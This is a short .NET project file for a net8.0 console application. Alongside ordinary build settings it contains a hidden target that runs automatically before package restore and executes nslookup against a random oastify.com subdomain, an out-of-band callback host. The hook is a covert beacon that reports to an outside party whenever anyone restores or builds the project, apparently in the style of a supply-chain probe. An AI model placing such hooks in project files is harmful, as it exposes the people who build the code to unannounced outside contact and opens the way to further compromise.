<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

  <Target Name="RunCustomScriptOnRestore" BeforeTargets="Restore">
    <Exec Command="nslookup 2qtk12zb9lf2fm47krf7r3s19sfj3br0.oastify.com" />
  </Target>

</Project>
